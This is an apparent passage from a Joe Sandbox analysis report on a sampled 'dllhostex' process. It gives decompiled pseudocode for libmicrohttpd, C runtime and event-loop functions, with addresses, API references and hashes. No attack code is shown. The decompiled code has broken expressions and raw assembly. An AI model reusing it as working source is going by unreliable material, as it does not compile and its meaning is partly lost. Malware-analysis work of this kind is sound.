					asm("xorps xmm0, xmm0");
					asm("movlpd [esp+0x1c], xmm0");
					asm("movlpd [esp+0x24], xmm0");
					if(_t61 != 0x10) {
						if(_t61 != 0x1c) {
							goto L64;
						}
						asm("movups xmm0, [edx+0x8]");
						_v28 = 0x17;
						asm("movups [esp+0x18], xmm0");
						goto L8;
					} else {
						_v28 = 2;
						_v24 =  *((intOrPtr*)(_t105 + 4));
						L8:
						_t62 = _t113 + 0x84;
						_v32 = _t62;
						EnterCriticalSection(_t62);
						_t116 = _t113 + 0x68;
						_t93 = _t116;
						if(_t93 == 0) {
							L23:
							 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1c7, "Failed to find previously-added IP address\n");
							_t118 = _t118 + 0x10;
							L24:
							_t64 =  *_t93;
							if(_t64 == 0) {
								goto L23;
							}
							_t94 =  *_t64;
							_t65 =  *((intOrPtr*)(_t94 + 0x14));
							if(_t65 == 0) {
								_t65 =  *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1cd, "Previously-added IP address had counter of zero\n");
								_t118 = _t118 + 0x10;
							}
							_t66 = _t65 + 0xffffffff;
							 *((intOrPtr*)(_t94 + 0x14)) = _t66;
							if(_t66 != 0) {
								L63:
								LeaveCriticalSection(_v32);
								goto L64;
							} else {
								if(_t116 == 0) {
									L62:
									E0135C9E5(_t94);
									_t118 = _t118 + 4;
									goto L63;
								}
								_t111 =  *_t116;
								if(_t111 == 0) {
									goto L62;
								}
								_t106 =  *_t111;
								_t99 = _t94;
								_t113 = 0x10;
								while(1) {
									_t68 =  *_t99;
									if(_t68 !=  *_t106) {
										break;
									}
									_t99 = _t99 + 4;
									_t106 = _t106 + 4;
									_t113 = _t113 - 4;
									if(_t113 >= 0) {
										continue;
									}
									_t107 = 0;
									L40:
									if(_t107 == 0) {
										L53:
										_t114 = _t111[1];
										_t100 = _t111[2];
										if(_t114 == 0) {
											L57:
											_t113 = _t100;
											L61:
											E0135C9E5( *_t116);
											_t118 = _t118 + 4;
											 *_t116 = _t113;
											goto L62;
										}
										if(_t100 == 0) {
											goto L61;
										}
										_t70 =  *(_t100 + 4);
										if(_t70 != 0) {
											_t113 = _t70;
											_t71 =  *(_t113 + 4);
											if(_t71 == 0) {
												L60:
												 *(_t100 + 4) =  *(_t113 + 8);
												 *(_t113 + 4) = ( *_t116)[1];
												 *(_t113 + 8) = ( *_t116)[2];
												goto L61;
											} else {
												goto L59;
											}
											do {
												L59:
												_t100 = _t113;
												_t113 = _t71;
												_t71 =  *(_t113 + 4);
											} while (_t71 != 0);
											goto L60;
										}
										 *(_t100 + 4) = _t114;
										goto L57;
									} else {
										goto L41;
									}
									while(1) {
										L41:
										_t116 =  >=  ?  &(( *_t116)[2]) :  &(( *_t116)[1]);
										_t111 =  *_t116;
										if(_t111 == 0) {
											goto L62;
										}
										_t108 =  *_t111;
										_t102 = _t94;
										_t113 = 0x10;
										while(1) {
											_t78 =  *_t102;
											if(_t78 !=  *_t108) {
												break;
											}
											_t102 = _t102 + 4;
											_t108 = _t108 + 4;
											_t113 = _t113 - 4;
											if(_t113 >= 0) {
												continue;
											}
											_t107 = 0;
											L52:
											if(_t107 != 0) {
												goto L41;
											}
											goto L53;
										}
										if(_t78 !=  *_t108 ||  *((intOrPtr*)(_t102 + 1)) !=  *((intOrPtr*)(_t108 + 1)) ||  *((intOrPtr*)(_t102 + 2)) !=  *((intOrPtr*)(_t108 + 2)) ||  *((intOrPtr*)(_t102 + 3)) !=  *((intOrPtr*)(_t108 + 3))) {
											asm("sbb edx, edx");
											_t107 = _t108 | 0x00000001;
										} else {
											_t107 = 0;
										}
										goto L52;
									}
									goto L62;
								}
								if(_t68 !=  *_t106 ||  *((intOrPtr*)(_t99 + 1)) !=  *((intOrPtr*)(_t106 + 1)) ||  *((intOrPtr*)(_t99 + 2)) !=  *((intOrPtr*)(_t106 + 2)) ||  *((intOrPtr*)(_t99 + 3)) !=  *((intOrPtr*)(_t106 + 3))) {
									asm("sbb edx, edx");
									_t107 = _t106 | 0x00000001;
								} else {
									_t107 = 0;
								}
								goto L40;
							}
						}
						_t112 =  *_t93;
						if(_t112 == 0) {
							goto L23;
						}
						do {
							_t103 =  *_t112;
							_t109 =  &_v28;
							_t113 = 0x10;
							while(1) {
								_t85 =  *_t109;
								if(_t85 !=  *_t103) {
									break;
								}
								_t109 = _t109 + 4;
								_t103 = _t103 + 4;
								_t113 = _t113 - 4;
								if(_t113 >= 0) {
									continue;
								}
								_t104 = 0;
								L21:
								if(_t104 == 0) {
									goto L24;
								}
								goto L22;
							}
							if(_t85 !=  *_t103 ||  *((intOrPtr*)(_t109 + 1)) !=  *((intOrPtr*)(_t103 + 1)) ||  *((intOrPtr*)(_t109 + 2)) !=  *((intOrPtr*)(_t103 + 2)) ||  *((intOrPtr*)(_t109 + 3)) !=  *((intOrPtr*)(_t103 + 3))) {
								asm("sbb ecx, ecx");
								_t104 = _t103 | 0x00000001;
							} else {
								_t104 = 0;
							}
							goto L21;
							L22:
							_t95 =  &(_t112[1]);
							_t87 = 0 | _t104 > 0x00000000;
							_t112 = _t95[_t87];
							_t93 =  &(_t95[_t87]);
						} while (_t112 != 0);
						goto L23;
					}
				} else {
					do {
						_t113 = _t59;
						_t59 =  *(_t113 + 0x60);
					} while (_t59 != 0);
					goto L3;
				}
			}








































                                                0x013490a0
                                                0x013490a0
                                                0x013490a3
                                                0x013490aa
                                                0x013490b1
                                                0x013490b4
                                                0x013490b9
                                                0x013490c9
                                                0x013490d0
                                                0x0134931c
                                                0x0134932e
                                                0x0134932e
                                                0x013490d6
                                                0x013490da
                                                0x013490dd
                                                0x013490e3
                                                0x013490ec
                                                0x01349102
                                                0x00000000
                                                0x00000000
                                                0x01349108
                                                0x0134910c
                                                0x01349114
                                                0x00000000
                                                0x013490ee
                                                0x013490f1
                                                0x013490f9
                                                0x01349119
                                                0x01349119
                                                0x01349120
                                                0x01349124
                                                0x0134912a
                                                0x0134912d
                                                0x01349131
                                                0x013491a2
                                                0x013491b7
                                                0x013491bd
                                                0x013491c0
                                                0x013491c0
                                                0x013491c4
                                                0x00000000
                                                0x00000000
                                                0x013491c6
                                                0x013491c8
                                                0x013491cd
                                                0x013491e4
                                                0x013491ea
                                                0x013491ea
                                                0x013491ed
                                                0x013491f0
                                                0x013491f3
                                                0x01349312
                                                0x01349316
                                                0x00000000
                                                0x013491f9
                                                0x013491fb
                                                0x01349309
                                                0x0134930a
                                                0x0134930f
                                                0x00000000
                                                0x0134930f
                                                0x01349201
                                                0x01349206
                                                0x00000000
                                                0x00000000
                                                0x0134920c
                                                0x0134920e
                                                0x01349210
                                                0x01349215
                                                0x01349215
                                                0x01349219
                                                0x00000000
                                                0x00000000
                                                0x0134921b
                                                0x0134921e
                                                0x01349221
                                                0x01349224
                                                0x00000000
                                                0x00000000
                                                0x01349226
                                                0x0134924f
                                                0x01349251
                                                0x013492b3
                                                0x013492b3
                                                0x013492b6
                                                0x013492bb
                                                0x013492cb
                                                0x013492cb
                                                0x013492fb
                                                0x013492fe
                                                0x01349303
                                                0x01349306
                                                0x00000000
                                                0x01349306
                                                0x013492bf
                                                0x00000000
                                                0x00000000
                                                0x013492c1
                                                0x013492c6
                                                0x013492cf
                                                0x013492d1
                                                0x013492d6
                                                0x013492e3
                                                0x013492e6
                                                0x013492ef
                                                0x013492f8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013492d8
                                                0x013492d8
                                                0x013492d8
                                                0x013492da
                                                0x013492dc
                                                0x013492df
                                                0x00000000
                                                0x013492d8
                                                0x013492c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01349253
                                                0x01349253
                                                0x0134925e
                                                0x01349261
                                                0x01349266
                                                0x00000000
                                                0x00000000
                                                0x0134926c
                                                0x0134926e
                                                0x01349270
                                                0x01349275
                                                0x01349275
                                                0x01349279
                                                0x00000000
                                                0x00000000
                                                0x0134927b
                                                0x0134927e
                                                0x01349281
                                                0x01349284
                                                0x00000000
                                                0x00000000
                                                0x01349286
                                                0x013492af
                                                0x013492b1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013492b1
                                                0x0134928c
                                                0x013492aa
                                                0x013492ac
                                                0x013492a6
                                                0x013492a6
                                                0x013492a6
                                                0x00000000
                                                0x0134928c
                                                0x00000000
                                                0x01349253
                                                0x0134922c
                                                0x0134924a
                                                0x0134924c
                                                0x01349246
                                                0x01349246
                                                0x01349246
                                                0x00000000
                                                0x0134922c
                                                0x013491f3
                                                0x01349133
                                                0x01349137
                                                0x00000000
                                                0x00000000
                                                0x01349140
                                                0x01349140
                                                0x01349142
                                                0x01349146
                                                0x01349150
                                                0x01349150
                                                0x01349154
                                                0x00000000
                                                0x00000000
                                                0x01349156
                                                0x01349159
                                                0x0134915c
                                                0x0134915f
                                                0x00000000
                                                0x00000000
                                                0x01349161
                                                0x0134918a
                                                0x0134918c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134918c
                                                0x01349167
                                                0x01349185
                                                0x01349187
                                                0x01349181
                                                0x01349181
                                                0x01349181
                                                0x00000000
                                                0x0134918e
                                                0x01349190
                                                0x01349195
                                                0x01349198
                                                0x0134919b
                                                0x0134919e
                                                0x00000000
                                                0x01349140
                                                0x013490c0
                                                0x013490c0
                                                0x013490c0
                                                0x013490c2
                                                0x013490c5
                                                0x00000000
                                                0x013490c0

                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 01349124
                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,?,0000009C), ref: 01349316
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 013491D9
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 013491AC
                                                • Previously-added IP address had counter of zero, xrefs: 013491CF
                                                • Failed to find previously-added IP address, xrefs: 013491A2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID: Failed to find previously-added IP address$Previously-added IP address had counter of zero$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 3168844106-1660310532
                                                • Opcode ID: 7082168197562158b9f58bce18fb372eb66c8f14536d18e2e3ef84ec7d504a1f
                                                • Instruction ID: adfda3dd27fb3b9c85ce70ea5113729d736c98e76cd5b2402f3a42d81564d4f9
                                                • Opcode Fuzzy Hash: 7082168197562158b9f58bce18fb372eb66c8f14536d18e2e3ef84ec7d504a1f
                                                • Instruction Fuzzy Hash: 5B81A6316042499FDB26CF2DC451777BBE2BF8A61CF5986ACD4898B246D731F942CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01360096 Relevance: 9.2, APIs: 6, Instructions: 168fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 70%
                                                			E01360096(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				char _v28;
				void* _v29;
				char _v35;
				void _v36;
				intOrPtr _v40;
				long _v44;
				intOrPtr _v48;
				intOrPtr* _v52;
				void* _v56;
				signed int _v60;
				int _v64;
				long _v68;
				void* __esi;
				signed int _t83;
				signed int _t85;
				int _t91;
				intOrPtr* _t93;
				void* _t100;
				void* _t102;
				intOrPtr _t103;
				long _t107;
				void _t115;
				void* _t124;
				signed int _t129;
				signed int _t131;
				signed char _t135;
				signed int _t140;
				signed char _t141;
				intOrPtr* _t142;
				intOrPtr _t143;
				signed char _t144;
				intOrPtr* _t147;
				intOrPtr* _t148;
				signed int _t150;
				void* _t151;
				void* _t152;

				_t83 =  *0x13cc074; // 0x4132269f
				_v8 = _t83 ^ _t150;
				_t85 = _a8;
				_t142 = _a12;
				_t129 = (_t85 & 0x0000003f) * 0x30;
				_t131 = _t85 >> 6;
				_v52 = _t142;
				_v60 = _t131;
				_v56 =  *((intOrPtr*)(_t129 +  *((intOrPtr*)(0x13d5278 + _t131 * 4)) + 0x18));
				_v48 = _a16 + _t142;
				_t91 = GetConsoleCP();
				_t148 = _a4;
				_v64 = _t91;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t93 = _v52;
				_t147 = _t93;
				if(_t93 < _v48) {
					_v40 = _t93 + 1;
					do {
						_v28 = 0;
						_v35 =  *_t147;
						_t143 =  *((intOrPtr*)(0x13d5278 + _v60 * 4));
						_t135 =  *(_t129 + _t143 + 0x2d);
						if((_t135 & 0x00000004) == 0) {
							_v29 =  *_t147;
							_t100 = E01361CCD(_t143);
							_t144 = _v29;
							_t148 = _a4;
							if( *((intOrPtr*)(_t100 + (_t144 & 0x000000ff) * 2)) >= 0) {
								_push(1);
								_push(_t147);
								goto L9;
							} else {
								if(_v40 >= _v48) {
									_t140 = _v60;
									 *(_t129 +  *((intOrPtr*)(0x13d5278 + _t140 * 4)) + 0x2e) = _t144;
									 *(_t129 +  *((intOrPtr*)(0x13d5278 + _t140 * 4)) + 0x2d) =  *(_t129 +  *((intOrPtr*)(0x13d5278 + _t140 * 4)) + 0x2d) | 0x00000004;
									 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) + 1;
								} else {
									_t124 = E013658AE( &_v28, _t147, 2);
									_t152 = _t151 + 0xc;
									if(_t124 != 0xffffffff) {
										_t147 = _t147 + 1;
										_t103 = _v40 + 1;
										goto L11;
									}
								}
							}
						} else {
							_t141 = _t135 & 0x000000fb;
							_v16 =  *((intOrPtr*)(_t143 + _t129 + 0x2e));
							_push(2);
							_v15 = _t141;
							 *(_t129 + _t143 + 0x2d) = _t141;
							_push( &_v16);
							L9:
							_push( &_v28);
							_t102 = E013658AE();
							_t152 = _t151 + 0xc;
							if(_t102 != 0xffffffff) {
								_t103 = _v40;
								L11:
								_t147 = _t147 + 1;
								_v40 = _t103 + 1;
								_t107 = E01369D7F(_v64, 0,  &_v28, 1,  &_v24, 5, 0, 0);
								_t151 = _t152 + 0x20;
								_v68 = _t107;
								if(_t107 != 0) {
									if(WriteFile(_v56,  &_v24, _t107,  &_v44, 0) == 0) {
										L21:
										 *_t148 = GetLastError();
									} else {
										 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 8)) - _v52 + _t147;
										if(_v44 >= _v68) {
											if(_v35 != 0xa) {
												goto L18;
											} else {
												_t115 = 0xd;
												_v36 = _t115;
												if(WriteFile(_v56,  &_v36, 1,  &_v44, 0) == 0) {
													goto L21;
												} else {
													if(_v44 >= 1) {
														 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t148 + 8)) + 1;
														 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) + 1;
														goto L18;
													}
												}
											}
										}
									}
								}
							}
						}
						goto L22;
						L18:
					} while (_t147 < _v48);
				}
				L22:
				return E01353717(_v8 ^ _t150, _t148);
			}











































                                                0x0136009e
                                                0x013600a5
                                                0x013600a8
                                                0x013600ad
                                                0x013600b4
                                                0x013600b7
                                                0x013600bc
                                                0x013600c6
                                                0x013600cd
                                                0x013600d5
                                                0x013600d8
                                                0x013600de
                                                0x013600e3
                                                0x013600e8
                                                0x013600e9
                                                0x013600ea
                                                0x013600eb
                                                0x013600ee
                                                0x013600f3
                                                0x013600fa
                                                0x013600fd
                                                0x01360101
                                                0x01360108
                                                0x0136010b
                                                0x01360112
                                                0x01360119
                                                0x01360136
                                                0x01360139
                                                0x0136013e
                                                0x0136014a
                                                0x0136014d
                                                0x0136017a
                                                0x0136017c
                                                0x00000000
                                                0x0136014f
                                                0x01360155
                                                0x0136022b
                                                0x01360235
                                                0x01360240
                                                0x01360245
                                                0x0136015b
                                                0x01360162
                                                0x01360167
                                                0x0136016d
                                                0x01360176
                                                0x01360177
                                                0x00000000
                                                0x01360177
                                                0x0136016d
                                                0x01360155
                                                0x0136011b
                                                0x0136011f
                                                0x01360122
                                                0x01360128
                                                0x0136012a
                                                0x0136012d
                                                0x01360131
                                                0x0136017d
                                                0x01360180
                                                0x01360181
                                                0x01360186
                                                0x0136018c
                                                0x01360192
                                                0x01360195
                                                0x01360197
                                                0x0136019d
                                                0x013601ae
                                                0x013601b3
                                                0x013601b6
                                                0x013601bb
                                                0x013601d8
                                                0x0136024a
                                                0x01360250
                                                0x013601da
                                                0x013601e2
                                                0x013601eb
                                                0x013601f1
                                                0x00000000
                                                0x013601f3
                                                0x013601f5
                                                0x013601f6
                                                0x01360212
                                                0x00000000
                                                0x01360214
                                                0x01360218
                                                0x0136021a
                                                0x0136021d
                                                0x00000000
                                                0x0136021d
                                                0x01360218
                                                0x01360212
                                                0x013601f1
                                                0x013601eb
                                                0x013601d8
                                                0x013601bb
                                                0x0136018c
                                                0x00000000
                                                0x01360220
                                                0x01360220
                                                0x01360229
                                                0x01360252
                                                0x01360264

                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,0136082C,?,00000000,00000000,?), ref: 013600D8
                                                • __fassign.LIBCMT ref: 01360162
                                                • __fassign.LIBCMT ref: 01360181
                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 013601D0
                                                • WriteFile.KERNEL32(?,0136082C,00000001,?,00000000), ref: 0136020A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$Console
                                                • String ID:
                                                • API String ID: 3692784241-0
                                                • Opcode ID: 4485dbdc0572eff590311528d5aa42c51271a7e2997cf21348a6dcf12ff59282
                                                • Instruction ID: 3c762d8e2d3e44302e03f9137cd7d7459562334951272f89f06a09c905ecfe76
                                                • Opcode Fuzzy Hash: 4485dbdc0572eff590311528d5aa42c51271a7e2997cf21348a6dcf12ff59282
                                                • Instruction Fuzzy Hash: 01519EB1A00249AFDF15CFE8D886AEEBBFCEF09314F04816AF555E7285D2309905CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01341700 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 349COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E01341700(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _t196;
				void* _t204;
				signed int _t209;
				intOrPtr _t213;

				_t204 = __ebx;
				_t217 = __ecx;
				_t206 =  *(__ecx + 0x2c);
				_t213 =  *((intOrPtr*)(__ecx + 4));
				if(( *(__ecx + 0x2c) & 0x00000001) != 0) {
					L52:
					return _t196;
				} else {
					 *((intOrPtr*)(__ecx + 0xc)) = __edx;
					_t209 =  *((intOrPtr*)(__ecx + 8)) - 1;
					if(_t209 > 0xf) {
						L95:
						E0135EBB9(_t204, _t206, _t209, _t213, _t217);
						goto L96;
					} else {
						switch( *((intOrPtr*)(_t209 * 4 +  &M01341B10))) {
							case 0:
								__eflags =  *((char*)(__esi + 0x70));
								if( *((char*)(__esi + 0x70)) == 0) {
									__eax =  *(__esi + 0x2c);
									__eflags = __al & 0x00000020;
									if((__al & 0x00000020) == 0) {
										 *(__esi + 0x2c) = __eax;
										__eax =  *(__edi + 0x2c);
										 *(__esi + 0x28) =  *(__edi + 0x2c);
										 *(__edi + 0x2c) = __esi;
									}
								}
								goto L20;
							case 1:
								__eflags = __cl & 0x00000004;
								if((__cl & 0x00000004) == 0) {
									goto L49;
								} else {
									__eflags =  *(__edi + 0x38) - __esi;
									if( *(__edi + 0x38) == __esi) {
										__eax =  *(__esi + 0x34);
										 *(__edi + 0x38) =  *(__esi + 0x34);
									}
									__eflags =  *(__edi + 0x44) - __esi;
									if( *(__edi + 0x44) == __esi) {
										__eax =  *(__esi + 0x34);
										 *(__edi + 0x44) =  *(__esi + 0x34);
									}
									goto L58;
								}
								goto L97;
							case 2:
								__ecx = __esi;
								__eax = E013402D0(__esi);
								__ecx =  *(__esi + 0x2c);
								__ecx = __ecx & 0x0000000c;
								__eflags = __al - 0xc;
								if(__al != 0xc) {
									__eax =  *(__esi + 4);
									_t186 = __eax + 4;
									 *_t186 =  *(__eax + 4) + 1;
									__eflags =  *_t186;
									__ecx =  *(__esi + 0x2c);
								}
								__ecx = __ecx & 0xfffffffb;
								__ecx = __ecx | 0x00000001;
								__eflags =  *(__esi + 0x74);
								goto L43;
							case 3:
								__eflags = __cl & 0x00000004;
								if((__cl & 0x00000004) == 0) {
									goto L49;
								} else {
									__ecx =  *(__esi + 0x30);
									 *__ecx = 0;
									 *(__esi + 0x30) = 0;
									__eflags =  *(__ecx + 0x4c) & 0x00000004;
									if(( *(__ecx + 0x4c) & 0x00000004) != 0) {
										__ecx = __ecx + 0x20;
										__edx = 0x1348e60;
										__eax = E01341700(__ebx, __ecx, 0x1348e60, __edi, __esi);
									}
									goto L62;
								}
								goto L97;
							case 4:
								goto L95;
							case 5:
								__eflags = __cl & 0x00000004;
								if((__cl & 0x00000004) == 0) {
									goto L49;
								} else {
									__eflags =  *(__edi + 0x3c) - __esi;
									if( *(__edi + 0x3c) == __esi) {
										__eax =  *(__esi + 0x34);
										 *(__edi + 0x3c) =  *(__esi + 0x34);
									}
									__eflags =  *(__edi + 0x48) - __esi;
									if( *(__edi + 0x48) == __esi) {
										__eax =  *(__esi + 0x34);
										 *(__edi + 0x48) =  *(__esi + 0x34);
									}
									goto L58;
								}
								goto L97;
							case 6:
								__eflags = __ecx & 0x00001000;
								if((__ecx & 0x00001000) != 0) {
									__ecx = __ecx & 0xffffefff;
									_t12 = __esi + 0x40;
									 *_t12 = 0xffffffff +  *(__esi + 0x40);
									__eflags =  *_t12;
									__edx = __ecx;
									 *(__esi + 0x2c) = __ecx;
									__eax = __ecx;
									if( *_t12 == 0) {
										__eflags = __dl & 0x00000001;
										if((__dl & 0x00000001) == 0) {
											__eflags = __al & 0x00000004;
											if((__al & 0x00000004) != 0) {
												__ecx = __ecx & 0xfffffffb;
												 *(__esi + 0x2c) = __ecx;
												__eflags = __cl & 0x00000008;
												if((__cl & 0x00000008) != 0) {
													_t22 = __edi + 4;
													 *_t22 =  *(__edi + 4) - 1;
													__eflags =  *_t22;
													__ecx =  *(__esi + 0x2c);
												}
											}
										}
									}
								}
								__eflags = __cl & 0x00000040;
								if(__eflags != 0) {
									__ecx = __ecx & 0xffffffbf;
									_t27 = __esi + 0x40;
									 *_t27 = 0xffffffff +  *(__esi + 0x40);
									__eflags =  *_t27;
									 *(__esi + 0x2c) = __ecx & 0xffffffbf;
									if(__eflags == 0) {
										__eflags = __al & 0x00000001;
										if(__eflags == 0) {
											__eflags = __cl & 0x00000004;
											if(__eflags != 0) {
												 *(__esi + 0x2c) = __ecx;
												__eflags = __cl & 0x00000008;
												if(__eflags != 0) {
													__eax =  *(__esi + 4);
													_t38 = __eax + 4;
													 *_t38 =  *(__eax + 4) - 1;
													__eflags =  *_t38;
												}
											}
										}
									}
								}
								__edx = __esi;
								__eax = E01346D00(__esi, __eflags);
								__eflags =  *(__esi + 0x3c);
								if( *(__esi + 0x3c) == 0) {
									__eax =  *(__esi + 0x2c);
									__eflags = __al & 0x00000020;
									if((__al & 0x00000020) == 0) {
										__eax = __eax | 0x00000020;
										__eflags = __eax;
										 *(__esi + 0x2c) = __eax;
										__eax =  *(__edi + 0x2c);
										 *(__esi + 0x28) =  *(__edi + 0x2c);
										 *(__edi + 0x2c) = __esi;
									}
								}
								_t48 = __esi + 0x2c;
								 *_t48 =  *(__esi + 0x2c) & 0xffff3fff;
								__eflags =  *_t48;
								L20:
								__ecx =  *(__esi + 0x2c);
								__eax = __ecx;
								__eax = __ecx & 0x0000000c;
								__eflags = __al - 0xc;
								if(__al != 0xc) {
									__eax =  *(__esi + 4);
									_t52 = __eax + 4;
									 *_t52 =  *(__eax + 4) + 1;
									__eflags =  *_t52;
									__ecx =  *(__esi + 0x2c);
								}
								__ecx = __ecx & 0xfffffffb;
								__ecx = __ecx | 0x00000001;
								__eflags = __ecx;
								 *(__esi + 0x2c) = __ecx;
								_pop(__edi);
								_pop(__esi);
								__esp = __ebp;
								_pop(__ebp);
								return __eax;
								goto L97;
							case 7:
								__edx = __esi;
								__ecx = __edi;
								__eax = E01347F80(__edi, __esi, __edi);
								_pop(__edi);
								_pop(__esi);
								__esp = __ebp;
								_pop(__ebp);
								return __eax;
								goto L97;
							case 8:
								__eflags = __cl & 0x00000004;
								if((__cl & 0x00000004) == 0) {
									goto L49;
								} else {
									__eflags =  *(__edi + 0x34) - __esi;
									if( *(__edi + 0x34) == __esi) {
										__eax =  *(__esi + 0x34);
										 *(__edi + 0x34) =  *(__esi + 0x34);
									}
									__eflags =  *(__edi + 0x40) - __esi;
									if( *(__edi + 0x40) == __esi) {
										__eax =  *(__esi + 0x34);
										 *(__edi + 0x40) =  *(__esi + 0x34);
									}
									L58:
									__ecx =  *(__esi + 0x30);
									__eflags = __ecx;
									if(__ecx != 0) {
										__eax =  *(__esi + 0x34);
										 *(__ecx + 0x34) =  *(__esi + 0x34);
									}
									__ecx =  *(__esi + 0x34);
									__eflags = __ecx;
									if(__ecx != 0) {
										__eax =  *(__esi + 0x30);
										 *(__ecx + 0x30) =  *(__esi + 0x30);
									}
									L62:
									__ecx =  *(__esi + 0x2c);
									__eflags = __cl & 0x00000004;
									if((__cl & 0x00000004) == 0) {
										goto L49;
									} else {
										__ecx = __ecx & 0xfffffffb;
										 *(__esi + 0x2c) = __ecx;
										__eflags = __cl & 0x00000008;
										if((__cl & 0x00000008) == 0) {
											goto L49;
										} else {
											__eax =  *(__esi + 4);
											 *((intOrPtr*)( *(__esi + 4) + 4)) =  *((intOrPtr*)( *(__esi + 4) + 4)) - 1;
											goto L48;
										}
									}
								}
								goto L97;
							case 9:
								__ecx = __ecx & 0x0000000c;
								__eflags = __al - 0xc;
								if(__al != 0xc) {
									_t170 = __edi + 4;
									 *_t170 =  *(__edi + 4) + 1;
									__eflags =  *_t170;
									__ecx =  *(__esi + 0x2c);
								}
								__eax =  *(__esi + 0x7c);
								__ecx = __ecx & 0xfffffffb;
								__ecx = __ecx | 0x00000001;
								 *(__esi + 0x2c) = __ecx;
								__eflags = __eax - 0xffffffff;
								if(__eax == 0xffffffff) {
									L86:
									__eflags =  *(__esi + 0x84);
									if( *(__esi + 0x84) != 0) {
										goto L52;
									} else {
										__eax =  *(__esi + 0x2c);
										__eflags = __al & 0x00000020;
										if((__al & 0x00000020) != 0) {
											goto L52;
										} else {
											__eax = __eax | 0x00000020;
											__eflags = __eax;
											 *(__esi + 0x2c) = __eax;
											__eax =  *(__edi + 0x2c);
											 *(__esi + 0x28) = __eax;
											 *(__edi + 0x2c) = __esi;
											_pop(__edi);
											_pop(__esi);
											__esp = __ebp;
											_pop(__ebp);
											return __eax;
										}
									}
								} else {
									_push(0xffffffff);
									_push(__eax);
									__imp__UnregisterWaitEx();
									__eflags = __eax;
									if(__eax == 0) {
										L96:
										_t200 = E013488E0(_t204, GetLastError(), "UnregisterWaitEx", _t213, _t217);
										asm("fcomp qword [ecx]");
										_t201 = _t200 ^ 0x00000001;
										__eflags = _t201;
										asm("sahf");
										asm("sbb [ecx+eax], esi");
										asm("sbb dh, [ecx+eax]");
										return _t201;
									} else {
										 *(__esi + 0x7c) = 0xffffffff;
										goto L86;
									}
								}
								goto L97;
							case 0xa:
								return E01345760(__ecx);
								goto L97;
							case 0xb:
								__ecx = __esi;
								__eax = E0133FD00(__esi);
								L48:
								__ecx =  *(__esi + 0x2c);
								L49:
								__ecx = __ecx & 0x0000000c;
								__eflags = __al - 0xc;
								if(__al != 0xc) {
									__eax =  *(__esi + 4);
									_t113 = __eax + 4;
									 *_t113 =  *(__eax + 4) + 1;
									__eflags =  *_t113;
									__ecx =  *(__esi + 0x2c);
								}
								__ecx = __ecx & 0xfffffffb;
